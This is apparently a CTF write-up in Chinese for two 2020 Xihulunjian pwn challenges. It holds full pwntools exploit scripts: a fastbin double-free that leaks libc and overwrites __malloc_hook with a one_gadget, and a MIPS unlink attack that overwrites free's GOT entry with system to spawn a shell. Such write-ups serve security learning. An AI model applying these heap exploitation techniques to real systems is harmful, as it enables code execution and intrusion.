

2020安恒西湖论剑

mmutag

onegadget攻击realloc_hook

#coding:utf-8
from pwn import *
# Target selection: ``debug`` picks a local process (libc resolved from the
# local ELF object) or the remote service together with the challenge's
# own libc.so.6. Every hard-coded offset later in the script is only valid
# for that specific libc build.
context.log_level = 'debug'
debug = 1
elf = ELF('mmutag')

if debug:
    sh, libc = process('./mmutag'), elf.libc
else:
    sh, libc = remote('127.0.0.1', 10000), ELF('libc.so.6')


def save(introduce):
    """First menu, option 1: submit *introduce* at the 'introduce' prompt.

    The value is coerced with ``str`` and sent with ``send`` (no trailing
    newline), so raw payloads reach the target unchanged.
    NOTE: the parameter name shadows the module-level ``introduce()`` helper
    inside this function; harmless here, but easy to misread.
    """
    text = str(introduce)
    sh.sendlineafter('choice:\n\n', '1')
    sh.recvuntil('introduce \n')
    sh.send(text)
def introduce():
    """First menu, option 2: select the 'introduce' entry at the 'choice:' prompt."""
    choice = '2'
    sh.sendlineafter('choice:\n\n', choice)
def add(idx, content):
    """Second menu, option 1: create entry *idx* holding *content*.

    ``idx`` is sent as a line; ``content`` is sent raw via ``send`` so packed
    values (``p64`` output) are not altered by a trailing newline. The
    'choise:' prompt text is the target's own spelling and must match exactly.
    """
    option, entry_id, data = '1', str(idx), str(content)
    sh.sendlineafter('choise:\n', option)
    sh.recvuntil('id:\n')
    sh.sendline(entry_id)
    sh.recvuntil('content\n')
    sh.send(data)
def delete(idx):
    """Second menu, option 2: delete entry *idx* (sent as a line after the 'id:' prompt)."""
    entry_id = str(idx)
    sh.sendlineafter('choise:\n', '2')
    sh.recvuntil('id:\n')
    sh.sendline(entry_id)
def exit(content):
    """Second menu, option 3: pick the exit entry, then send *content* raw.

    Shadows the builtin ``exit``; the name is kept because the rest of the
    script calls it, but nothing in this file relies on the builtin.
    """
    data = str(content)
    sh.sendlineafter('choise:\n', '3')
    sh.send(data)
# --- interaction sequence (Python 2 pwntools: str and p64() output are concatenated
# directly and ljust(8,'\x00') is applied to the received bytes; under Python 3 this
# section needs b'' literals). ---
# The 'tag: ' reply is read as 14 hex characters and parsed as an address that the
# rest of the script treats as a stack location.
sh.recvuntil('name: \n')
sh.sendline('a')
sh.recvuntil('tag: ')
stack_addr = int(sh.recv(14),16)
log.success('stack_addr: '+hex(stack_addr))

introduce()
# Add/delete sequence from the writeup; the exact order (including deleting entry 1
# twice) is what the later steps depend on, so do not reorder these calls.
add(1,'a'*0x20)
add(2,'a'*0x20)
add(3,'a'*0x20)
delete(1)
delete(2)
delete(1)
add(4,p64(stack_addr-0x40))
add(5,'a'*0x20)
add(6,'a'*0x20)
# Candidate one_gadget offsets for this libc build (see the heading above); only
# index 3 is used below. They are meaningless for any other libc version.
one = [0x45226,0x4527a,0xf0364,0xf1207]
exit(p64(0)+p64(0x71)+p64(stack_addr-0x40))
add(7,'a'*0x48)
exit('a'*0x10)
# Bytes 0x66..0x6c of the 0x70-byte reply are treated as a libc pointer; 0x20840 is
# that pointer's distance from the libc base in this build.
libc_base  = u64(sh.recv(0x70)[0x66:0x6c].ljust(8,'\x00')) - 0x20840
log.success('libc_base: '+hex(libc_base)) 
# All remaining addresses are libc_base-relative; the -0x23 adjustment and the 11-byte
# prefix are layout constants taken from the writeup for this glibc version.
exit(p64(0)+p64(0x71)+p64(libc_base+libc.symbols['__malloc_hook']-0x23))
add(8,'a'*0x48)
add(9,'a'*11+p64(libc_base+one[3])+p64(libc_base+libc.symbols['__libc_realloc']+0))
# Final option-1 request with id 10 is driven by hand rather than via add(), then
# '/bin/sh\x00' is sent as the content.
sh.sendlineafter('choise:\n',str(1))
sh.sendlineafter('id:\n',str(10))
sh.sendline('/bin/sh\x00')
#gdb.attach(sh)  # uncomment to attach gdb to the local process before going interactive
sh.interactive()

managesystem

MIPS 的堆题，edit 的时候可以溢出 8 个字节

image-20201029140710473

调试的时候报错

qemu: uncaught target signal 11 (Segmentation fault) - core dumped

换成题目指定的libc.so.0库就可以了

最后写 GOT 表的时候，写 puts 的表项不行，写 free 的表项可以

from pwn import *
import sys
# Launch mode is the first CLI argument: "r" connects to the remote service,
# "l" runs the binary locally under qemu-mipsel, and anything else runs qemu
# with its gdb stub (-g) waiting on port 1234. With no argument at all,
# sys.argv[1] raises IndexError before anything is started.
# The -L directory is the qemu sysroot; per the note above it must hold the
# challenge's libc.so.0.
context.binary = "./managesystem"
binary = './managesystem'

mode = sys.argv[1]
if mode == "r":
    p = remote("127.0.0.1", 1234)
elif mode == "l":
    p = process(["qemu-mipsel", "-L", "/home/at0de/Desktop/mipspwn", binary])
else:
    p = process(["qemu-mipsel", "-g", "1234", "-L", "/home/at0de/Desktop/mipspwn", binary])

elf = ELF("./managesystem")
libc = ELF("libc.so.0")
context.log_level = "debug"

def add(size, info):
    """Option 1: create a record of *size* bytes holding *info*.

    ``size`` goes out as a line; ``info`` is sent with ``sendafter`` (no
    newline appended) so packed payloads arrive unchanged.
    """
    steps = (
        (p.sendlineafter, 'options >> \n', '1'),
        (p.sendlineafter, 'length: \n', str(size)),
        (p.sendafter, 'info: \n', str(info)),
    )
    for send, prompt, data in steps:
        send(prompt, data)

def delete(idx):
    """Option 2: delete the record with index *idx*."""
    target = str(idx)
    p.sendlineafter('options >> \n', '2')
    p.sendlineafter('user: \n', target)

def edit(idx, info):
    """Option 3: overwrite record *idx* with *info* (sent raw, no newline).

    Per the note above, the target's edit handler is where the 8-byte
    overflow lives, so the length of ``info`` is deliberately not checked here.
    """
    target, data = str(idx), str(info)
    p.sendlineafter('options >> \n', '3')
    p.sendlineafter('edit: \n', target)
    p.sendafter('info: \n', data)
def show(idx):
    """Option 4: ask the target to print record *idx*; the caller reads the reply."""
    target = str(idx)
    p.sendlineafter('options >> \n', '4')
    p.sendlineafter('show: \n', target)
# Python 2 script: str and p32() output are concatenated directly and
# libc.search(...).next() uses the Python 2 generator protocol; under Python 3
# this section needs b'' literals and next(libc.search(b'/bin/sh')).
# note_list is the record-table address used by the writeup. The same value is
# repeated as a bare literal 0x411830 twice below instead of reusing this name.
note_list = 0x411830
add(0x20,'a'*0x20)
add(0x18,'a'*0x18)
# Crafted record content from the writeup; its layout constants (0x21, note_list-0xc,
# note_list-0x8, 0x20) belong together and must not be changed independently.
edit(0,p32(0)+p32(0x21)+p32(note_list-0xc)+p32(note_list-0x8)+'a'*0x10+p32(0x20)+p32(0x20))
delete(1)
# Record content placing elf.got['puts'] with length 4 where the following show(1)
# reads from (per the writeup).
edit(0,p32(0)*2+p32(0x411830)+p32(0x20)+p32(elf.got['puts'])+p32(0x4))
show(1)
p.recvuntil('info: ')
# The 4 bytes after 'info: ' are taken as the resolved puts address; subtracting
# the symbol offset gives the libc base for this libc.so.0.
libc_base = u32(p.recv(4)) - libc.symbols['puts']
log.success('libc_base: '+hex(libc_base))
# Per the note above, free's GOT entry is used here because puts's did not work:
# record 1 is pointed at elf.got['free'] and then edited with system's address.
edit(0,p32(0x411830)+p32(0x20)+p32(elf.got['free'])+p32(0x4)+p32(libc_base+libc.search('/bin/sh').next()))
edit(1,p32(libc_base+libc.symbols['system']))
delete(2)
p.interactive()